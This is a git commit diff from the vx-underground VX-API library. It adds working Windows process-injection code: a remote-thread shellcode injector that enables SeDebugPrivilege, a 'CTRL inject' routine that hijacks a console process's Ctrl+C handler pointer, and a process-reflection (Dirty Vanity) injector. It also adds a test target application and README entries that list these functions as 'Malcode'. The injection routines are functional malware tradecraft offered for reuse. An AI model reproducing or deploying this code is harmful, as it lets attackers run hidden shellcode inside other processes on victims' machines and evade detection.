2.0.505

2022-12-19 17:23:43 -06:00 · 2022-12-19 17:23:43 -06:00 · bd5aba026d
parent 1e198d4dd8
commit bd5aba026d
17 changed files with 589 additions and 30 deletions
--- a/Applications/Main.cpp
+++ b/Applications/Main.cpp
@ -0,0 +1,61 @@
+#include <Windows.h>
+#include <stdio.h>
+
+BOOL PrintBanner(VOID)
+{
+	
+	puts("");
+	puts("       vx-underground.org Process Injection Testing Application (PITA)");
+	puts("");
+	puts("\t8b           d8  8b        d8  88        88    ,ad8888ba,   ");
+	puts("\t`8b         d8'   Y8,    ,8P   88        88   d8\"'    `\"8b  ");
+	puts("\t `8b       d8'     `8b  d8'    88        88  d8'            ");
+	puts("\t  `8b     d8'        Y88P      88        88  88             ");
+	puts("\t   `8b   d8'         d88b      88        88  88      88888  ");
+	puts("\t    `8b d8'        ,8P  Y8,    88        88  Y8,        88  ");
+	puts("\t     `888'        d8'    `8b   Y8a.   . a8P   Y8a.     a88  ");
+	puts("\t      `8'        8P        Y8   `\"Y8888Y\"'     `\"Y88888P\"");
+	puts("");
+	
+	puts("   Built for process injection testing && based on the research conducted by SafeBreach Labs");
+	puts("");
+	puts("");
+
+	return TRUE;
+}
+
+DWORD WndProcCallbackRoutine(_In_ LPVOID lpParameter)
+{
+	MSG Msg;
+	BOOL bRet;
+
+	printf("Message loop Thread ID = %ld\r\n", GetCurrentThreadId());
+	while ((bRet = GetMessage(&Msg, NULL, 0, 0)) != 0)
+	{
+		if (bRet == -1)
+			return GetLastError();
+
+		TranslateMessage(&Msg);
+		DispatchMessageW(&Msg);
+	}
+
+	return (DWORD)Msg.wParam;
+}
+
+INT main(VOID)
+{
+	HANDLE hThread = NULL;
+	PrintBanner();
+
+	hThread = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)WndProcCallbackRoutine, NULL, 0, NULL);
+	if (hThread == NULL)
+		return GetLastError();
+
+	while (TRUE)
+	{
+		printf("Process ID = %ld, Thread ID = %ld -- Application is in an alertable state\r\n", GetCurrentProcessId(), GetCurrentThreadId());
+		SleepEx(10000, TRUE);
+	}
+
+	return ERROR_SUCCESS;
+}
--- a/Applications.vcxproj
+++ b/Applications.vcxproj
@ -0,0 +1,135 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+  <ItemGroup Label="ProjectConfigurations">
+    <ProjectConfiguration Include="Debug|Win32">
+      <Configuration>Debug</Configuration>
+      <Platform>Win32</Platform>
+    </ProjectConfiguration>
+    <ProjectConfiguration Include="Release|Win32">
+      <Configuration>Release</Configuration>
+      <Platform>Win32</Platform>
+    </ProjectConfiguration>
+    <ProjectConfiguration Include="Debug|x64">
+      <Configuration>Debug</Configuration>
+      <Platform>x64</Platform>
+    </ProjectConfiguration>
+    <ProjectConfiguration Include="Release|x64">
+      <Configuration>Release</Configuration>
+      <Platform>x64</Platform>
+    </ProjectConfiguration>
+  </ItemGroup>
+  <PropertyGroup Label="Globals">
+    <VCProjectVersion>16.0</VCProjectVersion>
+    <Keyword>Win32Proj</Keyword>
+    <ProjectGuid>{fbf1308a-94f4-4bec-b2b3-d30a19bddb4a}</ProjectGuid>
+    <RootNamespace>ProcessInjectionTestingApplications</RootNamespace>
+    <WindowsTargetPlatformVersion>10.0</WindowsTargetPlatformVersion>
+  </PropertyGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
+    <ConfigurationType>Application</ConfigurationType>
+    <UseDebugLibraries>true</UseDebugLibraries>
+    <PlatformToolset>v143</PlatformToolset>
+    <CharacterSet>Unicode</CharacterSet>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
+    <ConfigurationType>Application</ConfigurationType>
+    <UseDebugLibraries>false</UseDebugLibraries>
+    <PlatformToolset>v143</PlatformToolset>
+    <WholeProgramOptimization>true</WholeProgramOptimization>
+    <CharacterSet>Unicode</CharacterSet>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
+    <ConfigurationType>Application</ConfigurationType>
+    <UseDebugLibraries>true</UseDebugLibraries>
+    <PlatformToolset>v143</PlatformToolset>
+    <CharacterSet>Unicode</CharacterSet>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
+    <ConfigurationType>Application</ConfigurationType>
+    <UseDebugLibraries>false</UseDebugLibraries>
+    <PlatformToolset>v143</PlatformToolset>
+    <WholeProgramOptimization>true</WholeProgramOptimization>
+    <CharacterSet>Unicode</CharacterSet>
+  </PropertyGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
+  <ImportGroup Label="ExtensionSettings">
+  </ImportGroup>
+  <ImportGroup Label="Shared">
+  </ImportGroup>
+  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <PropertyGroup Label="UserMacros" />
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+    <ClCompile>
+      <WarningLevel>Level3</WarningLevel>
+      <SDLCheck>true</SDLCheck>
+      <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <ConformanceMode>true</ConformanceMode>
+    </ClCompile>
+    <Link>
+      <SubSystem>Console</SubSystem>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+    <ClCompile>
+      <WarningLevel>Level3</WarningLevel>
+      <FunctionLevelLinking>true</FunctionLevelLinking>
+      <IntrinsicFunctions>true</IntrinsicFunctions>
+      <SDLCheck>true</SDLCheck>
+      <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <ConformanceMode>true</ConformanceMode>
+    </ClCompile>
+    <Link>
+      <SubSystem>Console</SubSystem>
+      <EnableCOMDATFolding>true</EnableCOMDATFolding>
+      <OptimizeReferences>true</OptimizeReferences>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
+    <ClCompile>
+      <WarningLevel>Level3</WarningLevel>
+      <SDLCheck>true</SDLCheck>
+      <PreprocessorDefinitions>_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <ConformanceMode>true</ConformanceMode>
+    </ClCompile>
+    <Link>
+      <SubSystem>Console</SubSystem>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
+    <ClCompile>
+      <WarningLevel>Level3</WarningLevel>
+      <FunctionLevelLinking>true</FunctionLevelLinking>
+      <IntrinsicFunctions>true</IntrinsicFunctions>
+      <SDLCheck>true</SDLCheck>
+      <PreprocessorDefinitions>NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <ConformanceMode>true</ConformanceMode>
+    </ClCompile>
+    <Link>
+      <SubSystem>Console</SubSystem>
+      <EnableCOMDATFolding>true</EnableCOMDATFolding>
+      <OptimizeReferences>true</OptimizeReferences>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemGroup>
+    <ClCompile Include="Main.cpp" />
+  </ItemGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
+  <ImportGroup Label="ExtensionTargets">
+  </ImportGroup>
+</Project>
--- a/Applications.vcxproj.filters
+++ b/Applications.vcxproj.filters
@ -0,0 +1,22 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+  <ItemGroup>
+    <Filter Include="Source Files">
+      <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
+      <Extensions>cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
+    </Filter>
+    <Filter Include="Header Files">
+      <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
+      <Extensions>h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd</Extensions>
+    </Filter>
+    <Filter Include="Resource Files">
+      <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
+      <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
+    </Filter>
+  </ItemGroup>
+  <ItemGroup>
+    <ClCompile Include="Main.cpp">
+      <Filter>Source Files</Filter>
+    </ClCompile>
+  </ItemGroup>
+</Project>
--- a/Applications.vcxproj.user
+++ b/Applications.vcxproj.user
@ -0,0 +1,4 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project ToolsVersion="Current" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+  <PropertyGroup />
+</Project>
--- a/README.md
+++ b/README.md
@ -3,7 +3,7 @@ managed by [vx-underground](https://vx-underground.org) | follow us on [Twitter]
  
 # VX-API

-Version: 2.0.488
+Version: 2.0.505

 Developer: smelly__vx
  
@ -42,6 +42,7 @@ You're free to use this in any manner you please. You do not need to use this en
 | StringToken | Apple (c) 1999 | String Manipulation |
 | ZeroMemoryEx | ReactOS | String Manipulation | 
 | ConvertCharacterStringToIntegerUsingNtdll | smelly__vx | String Manipulation |
+| MemoryFindMemory | KamilCuk | String Manipulation |
 | AdfCloseHandleOnInvalidAddress | Checkpoint Research | Anti-debug |
 | AdfIsCreateProcessDebugEventCodeSet | Checkpoint Research | Anti-debug |
 | AdfOpenProcessOnCsrss | Checkpoint Research | Anti-debug |
@ -156,6 +157,7 @@ You're free to use this in any manner you please. You do not need to use this en
 | MpfGetLsaPidFromRegistry | modexp | Malcode |
 | MpfGetLsaPidFromNamedPipe | modexp | Malcode |
 | ShellcodeExecutionViaFunctionCallbackMain | alfarom256, aahmad097| Malcode |
+| ProcessInjectionMain | SafeBreach Labs | Malcode |
 | MpfComMonitorChromeSessionOnce | smelly__vx | Malcode |
 | MpfExecute64bitPeBinaryInMemoryFromByteArrayNoReloc | aaaddress1 | Malcode |
 | MpfLolExecuteRemoteBinaryByAppInstaller | Wade Hickey | Malcode |
@ -185,11 +187,3 @@ You're free to use this in any manner you please. You do not need to use this en
 | IcmpSendEcho2Ex | N/A | N/A |
 | WQL Win32_Ping | Martin Friedrich | N/A |
 | Process Injection | N/A | N/A |
-
-# Notes
-| Function Name | Note | Fixed |
-| ------------- | ---- | ----- |
-| StringToken | Needs revision, buggy | N/A |
-| NtQueryOpenSubKeysEx | admin required | N/A |
-| ManualResourceDataFetching by Orca | Review and complete | N/A |
-| MpfComMonitorChromeSessionOnce | Usability improvements needed | N/A |
--- a/VX-API.sln
+++ b/VX-API.sln
@ -5,6 +5,8 @@ VisualStudioVersion = 17.3.32811.315
 MinimumVisualStudioVersion = 10.0.40219.1
 Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "VX-API", "VX-API\VX-API.vcxproj", "{12CF8029-1663-470E-B138-39DC69C35B1D}"
 EndProject
+Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "Process Injection Testing Applications", "Process Injection Testing Applications\Process Injection Testing Applications.vcxproj", "{FBF1308A-94F4-4BEC-B2B3-D30A19BDDB4A}"
+EndProject
 Global
 	GlobalSection(SolutionConfigurationPlatforms) = preSolution
 		Debug|x64 = Debug|x64
@ -21,6 +23,14 @@ Global
 		{12CF8029-1663-470E-B138-39DC69C35B1D}.Release|x64.Build.0 = Release|x64
 		{12CF8029-1663-470E-B138-39DC69C35B1D}.Release|x86.ActiveCfg = Release|Win32
 		{12CF8029-1663-470E-B138-39DC69C35B1D}.Release|x86.Build.0 = Release|Win32
+		{FBF1308A-94F4-4BEC-B2B3-D30A19BDDB4A}.Debug|x64.ActiveCfg = Debug|x64
+		{FBF1308A-94F4-4BEC-B2B3-D30A19BDDB4A}.Debug|x64.Build.0 = Debug|x64
+		{FBF1308A-94F4-4BEC-B2B3-D30A19BDDB4A}.Debug|x86.ActiveCfg = Debug|Win32
+		{FBF1308A-94F4-4BEC-B2B3-D30A19BDDB4A}.Debug|x86.Build.0 = Debug|Win32
+		{FBF1308A-94F4-4BEC-B2B3-D30A19BDDB4A}.Release|x64.ActiveCfg = Release|x64
+		{FBF1308A-94F4-4BEC-B2B3-D30A19BDDB4A}.Release|x64.Build.0 = Release|x64
+		{FBF1308A-94F4-4BEC-B2B3-D30A19BDDB4A}.Release|x86.ActiveCfg = Release|Win32
+		{FBF1308A-94F4-4BEC-B2B3-D30A19BDDB4A}.Release|x86.Build.0 = Release|Win32
 	EndGlobalSection
 	GlobalSection(SolutionProperties) = preSolution
 		HideSolutionNode = FALSE
--- a/VX-API/FunctionDeclaration.h
+++ b/VX-API/FunctionDeclaration.h
@ -37,6 +37,8 @@ typedef NTSTATUS(NTAPI* LDRREGISTERDLLNOTIFICATION)(ULONG, LDR_DLL_NOTIFICATION_
 typedef NTSTATUS(NTAPI* LDRUNREGISTERDLLNOTIFICATION)(PVOID);
 typedef NTSTATUS(NTAPI* RTLCHARTOINTEGER)(PCHAR, ULONG, PULONG);
 typedef ULONG(NTAPI* RTLUNIFORM)(PULONG);
+typedef NTSTATUS(NTAPI* RTLCREATEPROCESSREFLECTION)(HANDLE, ULONG, PVOID, PVOID, HANDLE, RTLP_PROCESS_REFLECTION_REFLECTION_INFORMATION*);
+typedef NTSTATUS(NTAPI* RTLENCODEREMOTEPOINTER)(HANDLE, PVOID, PVOID*);



--- a/VX-API/Internal.h
+++ b/VX-API/Internal.h
@ -61,6 +61,10 @@
 #define FILE_PIPE_READ_DATA 0x00000000
 #define FILE_PIPE_WRITE_SPACE 0x00000001

+#define RTL_CLONE_PROCESS_FLAGS_CREATE_SUSPENDED 0x00000001
+#define RTL_CLONE_PROCESS_FLAGS_INHERIT_HANDLES 0x00000002
+#define RTL_CLONE_PROCESS_FLAGS_NO_SYNCHRONIZE 0x00000004
+
 typedef struct _LSA_UNICODE_STRING {
 	USHORT Length;
 	USHORT MaximumLength;
@ -1155,3 +1159,10 @@ typedef union _LDR_DLL_NOTIFICATION_DATA {

 typedef VOID(CALLBACK* LDR_DLL_NOTIFICATION_FUNCTION)(ULONG, CONST PLDR_DLL_NOTIFICATION_DATA, PVOID);

+typedef struct RTLP_PROCESS_REFLECTION_REFLECTION_INFORMATION
+{
+	HANDLE ReflectionProcessHandle;
+	HANDLE ReflectionThreadHandle;
+	CLIENT_ID ReflectionClientId;
+} RTLP_PROCESS_REFLECTION_REFLECTION_INFORMATION, *PRTLP_PROCESS_REFLECTION_REFLECTION_INFORMATION;
+
--- a/VX-API/Main.cpp
+++ b/VX-API/Main.cpp
@ -35,8 +35,16 @@ int main(VOID)
 	Sei.dwLengthOfPayloadInBytes = 277;
 	Sei.MethodEnum = E_RTLUSERFIBERSTART;
 	DWORD dwX = 0;
+	
+	PROCESS_INJECTION_INFORMATION Pii = { 0 };
+
+	Pii.Payload = GlobalOpenCalcPayload;
+	Pii.dwLengthOfPayloadInBytes = 277;
+	Pii.ProcessId = 31480;
+	Pii.MethodEnum = E_CTRL_INJECT;

 	//ShellcodeExecutionViaFunctionCallbackMain(&Sei);
+	//ProcessInjectionMain(&Pii);

 	return dwError;
 }
--- a/VX-API/MemoryFindMemory.cpp
+++ b/VX-API/MemoryFindMemory.cpp
@ -0,0 +1,15 @@
+#include "StringManipulation.h"
+
+PVOID MemoryFindMemory(_In_ PVOID Haystack, _In_ SIZE_T HaystackLength, _In_ PVOID Needle, _In_ SIZE_T NeedleLength)
+{
+	if (!Haystack || !HaystackLength || !Needle || !NeedleLength)
+		return NULL;
+
+	for (PCHAR pChar = (PCHAR)Haystack; HaystackLength >= NeedleLength; ++pChar, --HaystackLength)
+	{
+		if (!memcmp(pChar, Needle, NeedleLength))
+			return pChar;
+	}
+
+	return NULL;
+}
--- a/VX-API/MpfProcessInjectionViaProcessReflection.cpp
+++ b/VX-API/MpfProcessInjectionViaProcessReflection.cpp
@ -0,0 +1,59 @@
+#include "Win32Helper.h"
+
+BOOL MpfProcessInjectionViaProcessReflection(_In_ PBYTE Shellcode, _In_ DWORD dwSizeOfShellcodeInBytes, _In_ DWORD TargetPid)
+{
+	/*
+		This process execution is really finnicky. I was able to get this to work
+		using the proof-of-concept dubbed "DirtyVanity".
+
+		Link: https://github.com/deepinstinct/Dirty-Vanity
+
+		However, I was unable to get this to work using traditional shellcode (or PIC binaries)
+		from projects such as Donut of MsfVenom. I am too lazy to modify the Shellcode supplied
+		from DeepInstinct.
+
+		tl;dr code works, too lazy to debug to determine more accurate shellcode requirements
+
+		/me shrugs
+	
+	*/
+
+	RTLCREATEPROCESSREFLECTION RtlCreateProcessReflection = NULL;
+	HMODULE hModule = NULL;
+	BOOL bFlag = FALSE;
+	HANDLE hHandle = NULL;
+	LPVOID BaseAddress = NULL;
+	SIZE_T DisposableObject = ERROR_SUCCESS;
+	RTLP_PROCESS_REFLECTION_REFLECTION_INFORMATION Information = { 0 };
+
+	hModule = GetModuleHandleEx2W(L"ntdll.dll");
+	if (hModule == NULL)
+		goto EXIT_ROUTINE;
+
+	RtlCreateProcessReflection = (RTLCREATEPROCESSREFLECTION)GetProcAddressA((DWORD64)hModule, "RtlCreateProcessReflection");
+	if (!RtlCreateProcessReflection)
+		goto EXIT_ROUTINE;
+
+	hHandle = OpenProcess(PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_CREATE_THREAD | PROCESS_DUP_HANDLE, TRUE, TargetPid);
+	if (hHandle == NULL)
+		goto EXIT_ROUTINE;
+
+	BaseAddress = VirtualAllocEx(hHandle, NULL, dwSizeOfShellcodeInBytes, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
+	if (BaseAddress == NULL)
+		goto EXIT_ROUTINE;
+
+	if (!WriteProcessMemory(hHandle, BaseAddress, Shellcode, dwSizeOfShellcodeInBytes, &DisposableObject))
+		goto EXIT_ROUTINE;
+
+	if (RtlCreateProcessReflection(hHandle, RTL_CLONE_PROCESS_FLAGS_INHERIT_HANDLES | RTL_CLONE_PROCESS_FLAGS_NO_SYNCHRONIZE, BaseAddress, NULL, NULL, &Information) != STATUS_SUCCESS)
+		goto EXIT_ROUTINE;
+
+	bFlag = TRUE;
+
+EXIT_ROUTINE:
+
+	if (hHandle)
+		CloseHandle(hHandle);
+
+	return bFlag;
+}
--- a/VX-API/ProcessInjectionMain.cpp
+++ b/VX-API/ProcessInjectionMain.cpp
@ -0,0 +1,168 @@
+#include "Win32Helper.h"
+
+
+// ---------------------------------------- EXIT ROUTINE ---------------------------------------- 
+//EXIT_ROUTINE_CASE_0:
+DWORD ProcessInjectionMain(_In_ PPROCESS_INJECTION_INFORMATION Pii)
+{
+	DWORD dwReturn = ERROR_SUCCESS;
+	HANDLE hHandle = NULL;
+	LPVOID BaseAddress = NULL;
+	HANDLE hThread = NULL;
+	BOOL bFlag = FALSE;
+
+	switch (Pii->MethodEnum)
+	{
+		case E_WRITEPROCESSMEMORY_CREATEREMOTETHREAD_EXECUTESHELLCODE:
+		{
+			hHandle = OpenProcess(PROCESS_ALL_ACCESS, FALSE, Pii->ProcessId);
+			if (hHandle == NULL)
+				break;
+
+			BaseAddress = VirtualAllocEx(hHandle, NULL, Pii->dwLengthOfPayloadInBytes, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
+			if (BaseAddress == NULL)
+				break;
+
+			if (!SetProcessPrivilegeToken(0))
+				break;
+
+			if (!WriteProcessMemory(hHandle, BaseAddress, Pii->Payload, Pii->dwLengthOfPayloadInBytes, NULL))
+				break;
+
+			hThread = CreateRemoteThread(hHandle, NULL, 0, (LPTHREAD_START_ROUTINE)BaseAddress, NULL, 0, NULL);
+			if (hThread == NULL)
+				break;
+
+			WaitForSingleObject(hThread, INFINITE);
+
+			bFlag = TRUE;
+
+			break;
+		}
+		
+		case E_CTRL_INJECT:
+		{
+			DWORD ConsoleAttachList[2] = { 0 };
+			DWORD ParentId = 0;
+			PVOID EncodedAddress = NULL;
+			INPUT Input = { 0 };
+			MODULEINFO KernelbaseInformation = { 0 };
+			HWND hWindow = NULL;
+			HMODULE KernelBase = NULL, hModule = NULL;
+			RTLENCODEREMOTEPOINTER RtlEncodeRemotePointer = NULL;
+			DWORD64 Encoded = 0;
+
+			PCHAR KernelBaseDefaultHandler = NULL;
+			PCHAR KernelBaseSingleHandler = NULL;
+
+			KernelBase = GetModuleHandleEx2W(L"kernelbase.dll");
+			hModule = GetModuleHandleEx2W(L"ntdll.dll");
+
+			if (!KernelBase || !hModule)
+				break;
+
+			RtlEncodeRemotePointer = (RTLENCODEREMOTEPOINTER)GetProcAddressA((DWORD64)hModule, "RtlEncodeRemotePointer");
+			if (RtlEncodeRemotePointer == NULL)
+				break;
+
+			if (!K32GetModuleInformation(InlineGetCurrentProcess, KernelBase, &KernelbaseInformation, sizeof(KernelbaseInformation)))
+				break;
+
+			KernelBaseDefaultHandler = (PCHAR)MemoryFindMemory(KernelBase, KernelbaseInformation.SizeOfImage, (PVOID)"\x48\x83\xec\x28\xb9\x3a\x01\x00\xc0", 9);
+			if (KernelBaseDefaultHandler == NULL)
+				break;
+
+			Encoded = (DWORD64)EncodePointer(KernelBaseDefaultHandler);
+			if (Encoded == 0)
+				break;
+
+			KernelBaseSingleHandler = (PCHAR)MemoryFindMemory(KernelBase, KernelbaseInformation.SizeOfImage, &Encoded, 8);
+			if (KernelBaseSingleHandler == NULL)
+				break;
+
+			if (GetConsoleProcessList(ConsoleAttachList, 2) < 2)
+				break;
+
+			if (ConsoleAttachList[0] != GetCurrentProcessIdFromTeb())
+				ParentId = ConsoleAttachList[0];
+			else
+				ParentId = ConsoleAttachList[1];
+
+			FreeConsole();
+			AttachConsole(Pii->ProcessId);
+
+			hWindow = GetConsoleWindow();
+
+			FreeConsole();
+			AttachConsole(ParentId);
+
+			hHandle = OpenProcess(PROCESS_VM_WRITE | PROCESS_VM_OPERATION, FALSE, Pii->ProcessId);
+
+			BaseAddress = VirtualAllocEx(hHandle, NULL, Pii->dwLengthOfPayloadInBytes, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
+			if (BaseAddress == NULL)
+				break;
+
+			if (!WriteProcessMemory(hHandle, BaseAddress, Pii->Payload, Pii->dwLengthOfPayloadInBytes, NULL))
+				break;
+
+			CloseHandle(hHandle);
+
+			hHandle = OpenProcess(PROCESS_VM_WRITE | PROCESS_VM_OPERATION, FALSE, Pii->ProcessId); // PROCESS_VM_OPERATION is required for RtlEncodeRemotePointer
+			if (hHandle == NULL)
+				break;
+
+			RtlEncodeRemotePointer(hHandle, BaseAddress, &EncodedAddress);
+
+			if (!WriteProcessMemory(hHandle, KernelBaseSingleHandler, &EncodedAddress, 8, NULL))
+				break;
+
+			Input.type = INPUT_KEYBOARD;
+			Input.ki.wScan = 0;
+			Input.ki.time = 0;
+			Input.ki.dwExtraInfo = 0;
+			Input.ki.wVk = VK_CONTROL;
+			Input.ki.dwFlags = 0; // 0 for key press
+
+			SendInput(1, &Input, sizeof(INPUT));
+			Sleep(100);
+
+			PostMessageA(hWindow, WM_KEYDOWN, 'C', 0);
+
+			Sleep(100);
+
+			Input.type = INPUT_KEYBOARD;
+			Input.ki.wScan = 0;
+			Input.ki.time = 0;
+			Input.ki.dwExtraInfo = 0;
+			Input.ki.wVk = VK_CONTROL;
+			Input.ki.dwFlags = KEYEVENTF_KEYUP;
+			SendInput(1, &Input, sizeof(INPUT));
+
+			RtlEncodeRemotePointer(hHandle, KernelBaseDefaultHandler, &EncodedAddress);
+			WriteProcessMemory(hHandle, KernelBaseSingleHandler, &EncodedAddress, 8, NULL);
+
+			bFlag = TRUE;
+			break;
+		}
+
+		default:
+			break;
+	}
+
+	if (!bFlag)
+		dwReturn = GetLastErrorFromTeb();
+
+	if (BaseAddress)
+	{
+		if(hHandle)
+			VirtualFreeEx(hHandle, BaseAddress, ERROR_SUCCESS, MEM_RELEASE);
+	}
+		
+	if (hThread)
+		CloseHandle(hThread);
+
+	if (hHandle)
+		CloseHandle(hHandle);
+
+	return dwReturn;
+}
--- a/VX-API/SetProcessPrivilegeToken.cpp
+++ b/VX-API/SetProcessPrivilegeToken.cpp
@ -15,17 +15,17 @@ BOOL SetProcessPrivilegeToken(_In_ DWORD PrivilegeEnum)

 	switch (PrivilegeEnum)
 	{
-	case 0:
-	{
-		StringCopyW(PrivilegeString, (PWCHAR)L"SeDebugPrivilege");
-		break;
-	}
-	case 1:
-	{
-		StringCopyW(PrivilegeString, (PWCHAR)L"SeBackupPrivilege");
-		break;
-	}
-	default:
+		case 0:
+		{
+			StringCopyW(PrivilegeString, (PWCHAR)L"SeDebugPrivilege");
+			break;
+		}
+		case 1:
+		{
+			StringCopyW(PrivilegeString, (PWCHAR)L"SeBackupPrivilege");
+			break;
+		}
+		default:
 		goto EXIT_ROUTINE;
 	}

--- a/VX-API/StringManipulation.h
+++ b/VX-API/StringManipulation.h
@ -36,4 +36,5 @@ VOID ByteArrayToCharArrayW(_Inout_ PWCHAR Destination, _In_ PBYTE Source, _In_ D
 INT ShlwapiCharStringToWCharString(_In_ PCHAR InString, _Inout_ PWCHAR OutString, _In_ INT BufferSize);
 INT ShlwapiWCharStringToCharString(_In_ PWCHAR InString, _Inout_ PCHAR OutString, _In_ INT BufferSize);
 ULONG ConvertCharacterStringToIntegerUsingNtdllA(_In_ PCHAR InString);
-ULONG ConvertCharacterStringToIntegerUsingNtdllW(_In_ PWCHAR InString);
+ULONG ConvertCharacterStringToIntegerUsingNtdllW(_In_ PWCHAR InString);
+PVOID MemoryFindMemory(_In_ PVOID Haystack, _In_ SIZE_T HaystackLength, _In_ PVOID Needle, _In_ SIZE_T NeedleLength);
--- a/VX-API/VX-API.vcxproj
+++ b/VX-API/VX-API.vcxproj
@ -235,6 +235,7 @@
    <ClCompile Include="IsProcessRunningAsAdmin.cpp" />
    <ClCompile Include="IsRegistryKeyValid.cpp" />
    <ClCompile Include="LdrLoadGetProcedureAddress.cpp" />
+    <ClCompile Include="MemoryFindMemory.cpp" />
    <ClCompile Include="MpfLolExecuteRemoteBinaryByAppInstaller.cpp" />
    <ClCompile Include="Main.cpp" />
    <ClCompile Include="ManualResourceDataFetching.cpp" />
@ -246,6 +247,8 @@
    <ClCompile Include="MpfGetLsaPidFromNamedPipe.cpp" />
    <ClCompile Include="MpfGetLsaPidFromRegistry.cpp" />
    <ClCompile Include="MpfGetLsaPidFromServiceManager.cpp" />
+    <ClCompile Include="MpfProcessInjectionViaProcessReflection.cpp" />
+    <ClCompile Include="ProcessInjectionMain.cpp" />
    <ClCompile Include="ProxyRegisterWaitLoadLibrary.cpp" />
    <ClCompile Include="ProxyWorkItemLoadLibrary.cpp" />
    <ClCompile Include="RemoveDescriptorEntry.cpp" />
--- a/VX-API/VX-API.vcxproj.filters
+++ b/VX-API/VX-API.vcxproj.filters
@ -67,6 +67,9 @@
    <Filter Include="Source Files\Rad Hardware Breakpoint Hooking Engine\Demonstration">
      <UniqueIdentifier>{5d653d78-df9a-400d-a3bd-3961bf4e09e4}</UniqueIdentifier>
    </Filter>
+    <Filter Include="Source Files\Windows API Helper Functions\Malicious Capabilities\Process Injection">
+      <UniqueIdentifier>{afb1a792-4365-4fb2-ae74-b93768c98289}</UniqueIdentifier>
+    </Filter>
  </ItemGroup>
  <ItemGroup>
    <ClCompile Include="Main.cpp">
@ -537,6 +540,15 @@
    <ClCompile Include="CreateProcessByWindowsRHotKeyEx.cpp">
      <Filter>Source Files\Windows API Helper Functions\Evasion</Filter>
    </ClCompile>
+    <ClCompile Include="MpfProcessInjectionViaProcessReflection.cpp">
+      <Filter>Source Files\Windows API Helper Functions\Malicious Capabilities\Process Injection</Filter>
+    </ClCompile>
+    <ClCompile Include="ProcessInjectionMain.cpp">
+      <Filter>Source Files\Windows API Helper Functions\Malicious Capabilities\Process Injection</Filter>
+    </ClCompile>
+    <ClCompile Include="MemoryFindMemory.cpp">
